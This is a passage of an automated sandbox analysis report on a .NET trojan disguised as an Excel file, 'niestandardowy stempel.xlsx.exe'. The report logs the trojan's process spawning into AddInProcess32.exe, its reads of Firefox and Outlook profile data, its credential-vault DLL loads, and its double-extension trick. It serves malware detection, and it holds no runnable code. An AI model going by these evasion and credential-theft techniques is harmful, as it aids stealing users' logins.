Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, ISZbPXDvPz.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, nAXAT51m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, nAXAT51m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, nAXAT51m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, nAXAT51m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, YpS.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.M_F+niestandardowy stempel.xlsx.exe.1fe331bf788.2.raw.unpack, YpS.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: M_F+niestandardowy stempel.xlsx.exe, RemoveEventHandlerSetUser.cs

Task registration methods: 'CreateInstanceAndUnwrapIConfiguredTaskAwaiter'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@7/5@2/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6696

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\20e6896f-ace9-447a-a023-9a33ec1ab8ec

Jump to behavior

Source: M_F+niestandardowy stempel.xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: M_F+niestandardowy stempel.xlsx.exe

Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe

File read: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe "C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe"
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6696 -s 1076
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: M_F+niestandardowy stempel.xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: M_F+niestandardowy stempel.xlsx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: M_F+niestandardowy stempel.xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.pdb(` source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdbMZ source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.pdb- source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb`c source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERA9A1.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdb source: WERA9A1.tmp.dmp.6.dr

Source: M_F+niestandardowy stempel.xlsx.exe

Static PE information: 0x9EA20D34 [Sun May 3 11:25:40 2054 UTC]

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B8A592C push ebx; retf	0_2_00007FFD9B8A59DA
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B8A5815 push ebx; retf	0_2_00007FFD9B8A59DA
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Code function: 0_2_00007FFD9B98026B push esp; retf 4810h	0_2_00007FFD9B980312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_02F3A229 pushfd ; retf 054Ah	2_2_02F3A6A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_02F30C95 push edi; retf	2_2_02F30C3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_02F30C3D push edi; ret	2_2_02F30CC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FB99 push es; iretd	2_2_0690FBC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FBDD push es; iretd	2_2_0690FBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FBC9 push es; iretd	2_2_0690FBCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FBCD push es; iretd	2_2_0690FBDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FB10 push es; iretd	2_2_0690FB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FB21 push es; iretd	2_2_0690FB24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FB55 push es; iretd	2_2_0690FB5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FB44 push es; iretd	2_2_0690FB54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FB71 push es; iretd	2_2_0690FB7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FB7D push es; iretd	2_2_0690FB88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690FB6D push es; iretd	2_2_0690FB70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690D89F push cs; ret	2_2_0690D8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 2_2_0690D88A push cs; ret	2_2_0690D88C

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: xlsx.exe

Static PE information: M_F+niestandardowy stempel.xlsx.exe

Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
